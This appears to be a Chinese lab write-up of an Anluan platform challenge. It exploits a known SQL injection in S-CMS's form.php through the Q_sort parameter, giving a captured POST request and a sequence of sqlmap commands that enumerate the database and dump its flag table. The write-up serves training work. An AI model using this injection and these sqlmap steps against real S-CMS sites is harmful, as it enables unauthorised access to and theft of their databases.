总体思路
- 通过title得知网站为s-cms
- 搜索引擎搜索s-cms历史漏洞 : 找到sql注入
- sqlmap梭哈找到flag
分步演示
1. 查看title,发现为s-cms建站
2. 查找s-scms历史漏洞,找到 form.php 存在sql注入 | sleep语句成功执行
3. 在Q_sort=1后加 * ,将数据包保存为1.txt:
POST /form.php?action=query&S_id=0 HTTP/1.1
Host: 106.15.50.112:8035
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=7bd4d643075464524223fc70d32e7a30; authorization=fail; authorization4=1MHwwfHMxMXxzMTA0fHM5NHxzOTV8czk5fHM5Nnx3NHx3OTR8dzk1fHc5Nnx3MTA0fHBjMTM1fHBjMTQ2fHBjMTA0fHBjOTR8cGM5NXxwYzk5fHBjOTZ8d2FwMTM1fHdhcDE0Nnx3YXA5NHx3YXA5NXx3YXA5Nnx3YXAxMDR8; __tins__18885840=%7B%22sid%22%3A%201668687646080%2C%20%22vd%22%3A%2020%2C%20%22expires%22%3A%201668689481280%7D; __51cke__=; __51laig__=20
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Q_sort=1*
4. sqlmap 跑数据包
sqlmap -r D:\sqlmap-txt\1.txt --batch
5. 读库 | 使用联合查询, 速度较快
sqlmap -r D:\sqlmap-txt\1.txt --tech U --dbs --batch
6. 查看scms库的所有表
sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms --tables --batch
7. 查看SL_flag表的所有字段
sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms -T SL_flag --columns --batch
8. 读取flag字段内容
sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms -T SL_flag -C "flag" --dump --batch
文章来源:https://www.toymoban.com/news/detail-552154.html
文章来源地址https://www.toymoban.com/news/detail-552154.html
到了这里,关于【安鸾渗透实战平台】实战渗透/企业网站的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!